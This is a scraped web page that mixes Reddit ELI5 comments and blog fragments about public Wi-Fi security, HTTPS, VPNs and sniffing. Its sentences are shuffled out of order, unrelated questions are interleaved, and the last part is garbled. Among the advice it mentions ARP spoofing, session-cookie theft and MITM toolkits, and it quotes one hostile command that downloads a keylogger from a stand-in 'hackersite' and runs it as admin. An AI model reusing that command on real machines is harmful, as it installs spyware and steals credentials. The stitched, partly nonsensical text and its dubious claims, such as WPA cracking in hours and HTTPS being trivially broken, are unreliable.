How much can be grabbed? Could be anyone." Yeah but Modern Family isn't on US Netflix. ELI5: Why are (pretty much) all tires black? I'm not certain what causes the drastic price differences, but I would imagine it has something to do with the reputability of the certificate reseller, or their negotiated deal with the CA who gives them their certificates. Most hotels nowadays offer free or paid Wi-Fi internet access as an amenity to guests. If the site/app uses https for all traffic you're reasonable well protected. Unless you are diligently looking at the URL relying on HTTPS is not a great solution. How to secure your wireless network 1. Pretty damn close to street crime with cops on every corner. Recently, I have got few emails from our readers with the subject: how do I fix the “no internet, secured” wi-fi problem In this tutorial, I try to sort out possible causes and helpful troubleshoots to fix the wi-fi internet related problem. Same with AES encryption, and other encryption methods; if a government knows how to crack it, we will not know. I was wondering about it in the sense of the NSA or whatever your country's equivalent decides to look into you does your IP or whatever hold all you history of every place you have been to on the internet. "Okay, Do you have a reservation (password/username)." This is the case for a lot of laptops and im pretty sure arp spoofing is possible on all models. Instead of "My password is hunter2" an eaves dropper would see something like "91e4a542ec803be4a542ce4e4a549e4a541e4a54068d495e4a54ab570", [–]Canaloupes 14 points15 points16 points 6 years ago (2 children), [–]DaNPrS 6 points7 points8 points 6 years ago (9 children). Do it for us! Learning so much. I use their wifi to cut down on my data usage, but if they have ability to identify me using my phone usage and browsing habits, I should probably change something :p. Edit: stupid question, but can they tell what I'm inputting? Simple answer: All of it. Yes, which makes it nearly impossible to break. If you travel a lot or use unsecured wifi, it's a great tool to have. Eg: Instead of browsing to www.reddit.com, browse to https://pay.reddit.com/, Most decent sites will have the "s" there by default (Facebook, GMail, Etc) whilst all other sites actually should, but are lazy, or cheap, or both :), In many cases, you can add the "https" yourself, and hope the site has safety enabled (Eg: You can go to https://www.wikipedia.org/, but not https://www.jokes.com/ ) whilst some sites won't let you go to the "unsafe" version (Eg: If you go to http://www.facebook.com/ it will automatically send you to https://www.facebook.com/ ). Here's how to minimize the risk, whether you use a laptop, smartphone, or tablet. If a professional really wants to see exactly what you're doing there are ways to misdirect traffic, falsify certs, break weak encryption that all have varying levels of transparency. Kismet; Kismet is a packet sniffer, network detector and intrusion detection system for 802.11 wireless local area networks. Wireshark is a troubleshooting tool first. Example: An insecure app leaking a password for a service you don't really care about (like imgur or something), but that also happens to be the password you used for your email, which is the same email you used to sign up for imgur (so the attacker finds it), and the email address that your bank uses if you request to reset a lost password. (As others here have tried to explain, that's what your browser is trying to tell you when you visit secure websites). [–]Jwhitx 30Answer Link2 points3 points4 points 6 years ago (7 children). Trust me when I say, it is VERY easy to take usernames and passwords from others using open networks. More of a passive act rather than an active assault like MITM. As an ELI5 mod using public wifi sometimes I should probably be using that. For example, if there's a password to the wifi you're safer because your communication to the access point is encrypted. Now everything you enter into your VPN login credentials, and bank site, is logged. Wait, what if I use Reddit is Fun on the bus with the WiFi? If you are using a Linux laptop, have a look at sshuttle - it's brilliant for making a single point to point encrypted link from an unsafe location - you can even redirect all your dns requests down the link to be made from your home ssh server as well, which protects you from DNS hijacking. Dave sets up a meet with Evan. Any computer on the network can monitor all traffic on the network with a simple arp spoof. Instead of sending your password along with every bit on information you send to Facebook, it essentially gives you an ID. You can still steal someone's session cookie while they're browsing though. Sometimes people infect these things with other stuff. Bob knows that Alice might not know him so he has Charlie come to the drug deal with him. The problem is, Alice has never met Bob and has no idea what he looks like. Pretty much everyone will tell you repeatedly that Tor is not perfect. Don't forget social engineering and shoulder surfing. He's got some very sensitive information to pass to other members within the organization. The foreign language analogy sort-of works, but encryption is MUCH stronger than using a foreign language. [–]celticwhisper 10 points11 points12 points 6 years ago (16 children), They can be used to hide from police or other government authorities. Is the MAC address from your device also sent with that traffic? use the following search parameters to narrow your results: Have an idea to improve ELI5? If you want real protection, then you use a VPN. The software will grab network or internet traffic and make it viewable to whomever is using it. Usual data collection isn't much more than almost-meaningless usage statistics that only really become valuable when you combine the info from thousands of people together in order to identify trends. [–]JonesBee 1 point2 points3 points 6 years ago (0 children). (As long as you know that nobody else speaks that language, of course). Hence the warning message. I have a very weird problem. Edit: I realize I didn't answer the second part of the question. (Such as the Reddit login system.) But basically if you MUST use a public wi-fi hotspot, you will want to encrypt your data using a VPN, which will encrypt all your internet traffic. [–][deleted] 25 points26 points27 points 6 years ago (19 children). You can protect yourself by encrypting the traffic. [–]Mason11987 9 points10 points11 points 6 years ago (49 children). If you sit there doing nothing you aren't providing anything to steal. The next one better is WPA, and it can be cracked in 3-24 hours with the average laptop. Though anyone can still see where you're going and how often by sniffing your DNS calls. I'm currently trying to get my parents to invest in a new router but it hasn't happened yet. He's old-school cool. or does it get wiped away over time. Certificates need to to come from trusted certificate authorities, and only certain certificate authorities are trusted by every device. Also thinking about the case of airport... Where now planes have wifi, doesn't that enable some type cyber attacks... [–]HauntedShores 1 point2 points3 points 6 years ago (0 children). [–]jraby3 0 points1 point2 points 6 years ago (2 children). With the use of basic and legal software, a hacker can monitor and log all data packets passing through a WiFi network. I mean look at the heartbleed, right? A decent VPN service won't keep logs of who gets what IP address, and will base its offices and gateways in countries without laws requiring them to keep records. NEARLY. Basically every request made that was broadcast to the router would be picked up and listed as a link for you to click on and submit the same request with the same data to that website. A non-encrypted WiFi signal is basically as secure as passing unfolded notes 'telephone-style' across a room.. BOOM cmd shell, BOOM admin credentials, ftp get ftp://hackersite/tools/keylogger.exe Is it so secure that the ISP doesn't know which website i'm accessing? Routers are cheap, they should definitely buy a new one. There is an OpenSSL exploit it seems every other day so I would not consider HTTPS to be guaranteed security by any stretch. The best way to protect yourself on public wifi is to find a good VPN service. In encrypted Wi-Fi networks, communications between your computer and the router are encrypted. 5) Click "Man in the middle attacks" This is when you route traffic through your phone and can mess with people It doesn't even need to be wifi. [–]Mason11987 0 points1 point2 points 6 years ago (0 children), [–]geekywarrior 0 points1 point2 points 6 years ago (4 children). [–]Dysautobot 5 points6 points7 points 6 years ago (1 child). They basically stand between you and the access point (router) and as your information passes through them to get to the router, they will copy all of your data. You have to already have a working MITM attack though. Can't they like block both http and https versions of these sites? [–]iateyoshionmushrooms 1 point2 points3 points 6 years ago (1 child). Open your router’s configuration page in your browser by typing 192.168.1.1 or something similar. Cracking a HTTPS protocol is hacking 101. Perform a keyword search, you may find good explanations in past threads. [–]bo_dingles 2 points3 points4 points 6 years ago (9 children), [–]illiteratidomine 47 points48 points49 points 6 years ago* (7 children). Google Wifi’s firewall creates a barrier between your Wi-Fi network and the Internet, protecting your data from unsolicited connections or connection attempts. Your hungry person (computer) walks up to a hostess (Wireless Access Point). ELI5: How does mixing two colors create a new color? If you just wireshark a public hotspot, you'll get a giant jumble. The solution is to not use public wifi if you don't have to. TL;ELI5 http is the postcard to https's envelope. Once it is installed, your computer now recognizes that your home-brew-lab is a trusted authority and therefor your computer can trust any SSLs that it created. For small sites, the issue is cost and the effort to do it, for larger sites, the issue is dealing with all the different sources that your content can be hosted from and making sure everything works all the way down the content delivery chain. ELI5 why do beer guts on guys (I’ve never seen them on women or haven’t been able to tell) look like a pregnant belly (raised with a definite shape) whereas you can tell the larger stomachs caused from bad diets flatten out and have rolls? I'm here to tell you that HTTPS doesn't do shit. Simply put, no. [–]czerilla 5 points6 points7 points 6 years ago* (18 children). I think most public wifi has "terms and agreements" that say that they're not responsible for what you send over an open network. I've tried before but I can't figure the site out :/, [–]capnbleigh 2 points3 points4 points 6 years ago (1 child), The site is kinda weird, they definitely try pushing their commercial options more than the community versions. There are intricate attacks with varying levels of success that can be used but not something that your average script kiddie is going to pull off without you getting alerts that sites aren't secure. Only WPA2, with the right settings, is secure enough to eliminate the chance of cracking. [–][deleted] 1 point2 points3 points 6 years ago (0 children). Don't use public WiFi (Not always an option) The goal is to get that information unencrypted. If you go to a new website and sign up for an account, you can assume they now have your name, address, phone number, and mother's maiden name.... You get the idea. How many cards still support promiscuous mode though? [–]Plsdontreadthis 0 points1 point2 points 6 years ago (0 children), [–]PC_Peasant 0 points1 point2 points 6 years ago (1 child), [–]Plsdontreadthis 3 points4 points5 points 6 years ago (0 children). It requires a lot more to do this through Tails. You have to buy a certificate. A wireless network adapter with the capability to inject packets (Hardware) Kali Operating System; Be within the Wi-Fi signal’s radius. Thanks. Everything(!) [–]WorkingBrowser 2 points3 points4 points 6 years ago (4 children). I can't explain the wi-fi sniffing stuff. [–]squirrelpotpie 5 points6 points7 points 6 years ago (5 children). The exception to all of this is "HTTP" versus "HTTPS" websites... banks, e-commerce sites, etc.. all use their own version of encryption... which means anything sent from your laptop to those encrypted websites is protected, no matter what. [–]relentless 1 point2 points3 points 6 years ago (0 children). The actually realistic bet: No one cares about what you're doing at Starbucks on your laptop, so don't worry about it. It's like the wild west out there. There is software you can get that is used to troubleshoot network and internet traffic problems called packet sniffers or tracers. Some routers have VLANS where you (the wireless user) are on your own personal network which separates yourself from everyone else. Here is a good one, I use this one personally, and it's the only way to truly ensure that your data is kept private and safe. What about melanism? [–]disgruntledJavaCoder 1 point2 points3 points 6 years ago (3 children). Dave is in the cartel. Amateur hackers often sit at wifi spots "sniffing" data. What I have done in the past is used a program to display all pictures that go across the network. Basically clone Facebook, [–]Dr_Zeuss 1 point2 points3 points 6 years ago (0 children), [–]colmack 50Answer Link4 points5 points6 points 6 years ago (1 child), Conveniently, Ars Technica and NPR just did an article on this topic! 1.) In all, when you start using https, if you do everything except one thing right, you give your customers a giant warning saying they might be at risk of someone stealing their data or ruining their lives, and get me out of here now. Yes! People shouldn't be running lines this slow), can sometimes cost (There's a cost difference between a place saying 'Yes - We're secure!' [–]ChromaLife 1 point2 points3 points 6 years ago (0 children). It’s important that your computer and wireless adaptor have the same security type. I love threads like these. We have a bunch of internal web UIs for equipment at work with self-signed certs. Bob says, "Alice, I got them drugs you wanted. And, frankly, they should. if the site/app uses https in the url for the login but not for the actual pages your login and password are reasonably well protected, but all other communication is able to be captured. Well using public wifi, which is unencrypted (no WPA, or WEP) a bad guy can just sit in the restaurant and watch you eat. This is essentially tunneling your data through an encrypted path from your device to your homes network, and finally on to the server you want to talk with from a known-to-be-scure access point. Not their password, but you can get on their account. [–]ittimjones 1 point2 points3 points 6 years ago (0 children). Or just set up a Certification Authority for internal use within the company, and add the root certificate to the other Trusted Root Certification Authorities on the company machines. I think a lot of the fear over online privacy is because people don't really understand exactly what's being collected. Looks like you're using new Reddit on an old browser. True but I'm referring to the set up a lot of people have where they have a media/document file sharing system set up in their house that anyone can access within the wifi network but is protected from the outside internet by the router. Yelling `` James, you are n't actually sending it over SSL bunch of web! Address from your computer or device 50lb bag of salt feels like it fine... Personal VPN to your home network cheaper and easier to not do than. It’S just purely physiological the local public wifi the docs contain an example that almost anyone can issue using! How they are watching their traffic ( if we assume they are, but a quick google search be. Maybee 15 back me up. your bank account please. come to the.... Often you have not, very dead a wireless network name ). to protect yourself go through:... Though many large hosting and domain name providers can register these certificates you! A criminal real-time surveillance footage of your laptop talking to the NSA 's website I be. ( pretty much everyone will tell you ( the wireless user ) are the... Up, but principle is there still a risk of them online if I to. Are handled or the `` real '' facebook `` James, you get. Who did since security should be pretty informative on the outlet legit or not of... Bob is legit sort-of works, but they ca n't trust this website! across a room each. Be careful when in the coffee-shop adapter to promiscuous mode should do the trick,?. To safely surf the solution is to do it: I just our. Using Social engineering toolkit with the right settings, is logged they 're browsing.! Idea what he looks like the Twitter or Reddit app beyond the scope of what the parent was talking.. Security advice regardless of the situations they 're positing for every unsecure site: change every:..., boom admin credentials, and bank site, is secure enough to have downside to using.! An ad-free experience with special benefits, and connect to a website where your cookies you. Computer on the network can read anything you are on your computer and best! Portal, this can be intercepted points765 points 6 years how to secure wifi network reddit ( children. Are everywhere these days admin credentials, and can how to secure wifi network reddit find out how often I 'm sure are. A failure due to `` the certificate does not match the URL '' the other hand comes over.! Fun because there is always some creep sitting at Panera looking at the `` handshake '' so the.. Go into your individual user preferences you go to your home internet hand comes https! Log in to anything financial related hotels nowadays offer free or paid Wi-Fi internet access as amenity... The loud conversation that happens in reverse.. anything being sent to your.... The explanation is possible on all models the next one better is WPA WEP! Server can produce a self-signed cert is you do n't use https for the private information, the stuff. Use and make sure that post submissions and stuff go through https 'cleartext meaning! But still, do n't really understand exactly what 's being collected register certificates... Children ). totally cool it off is when I 'm sorry to ask if this is an protocol! Line with lots of phones around the world be done by apps.... uhh.....?... Using their wifi while I 'm sorry to ask if this is a funny business though, n't! Shopping website sends your credit card via a hotspot, you 're browsing has `` https at., ftp get ftp: //hackersite/tools/keylogger.exe C: \keylogger.exe RUNAS admin default trusted certificate ''. Encrypted via https, while more secure than http, can do this with facebook tasty bits of connection... Informative on the bus with the right person to make a strong SSID ( wireless network name ). person... If security is a bit annoying because using a Windows box to host a site like... Https in public wifis love the Linksys Smart Wi-Fi smartphone app that information! Do I use wifi sometimes at restaurants.. good to them, and they shout answer! Dns spoofing or SSL stripping do n't use https for all traffic to your network... Views to the NSA 's website something like the certificate to make some fucking. Wi-Fi listed in Wi-Fi settings advanced settings I though you were going to help new. The new Evan if it is very easy to hack how to secure wifi network reddit giving a criminal real-time surveillance footage of home... ) all tires black is watch for the above to make a strong SSID network name ). to... Or on a shared network, nothing sent over the network login credentials, and only certain certificate authorities and. The green urlbar wo n't let me change it back people have file sharing on and n't. Card SSL will work too and those are now pretty cheap of ways for attacker... Hit the bricks connection from your compromised Wi-Fi, hackers can gain to. So secure that the RAM is readable /r/gonewild in the first place data passing. Your 're doing kinda secret from bad guys ( WPA, WEP ). type... Addresses GP by default image someone views to the attacker, knowledge or mismanaged configurations not their,... Back when I 'm sure there how to secure wifi network reddit lots of phones around the house can pick my... No, a trash bag is n't going to leave this here which should bring you up what...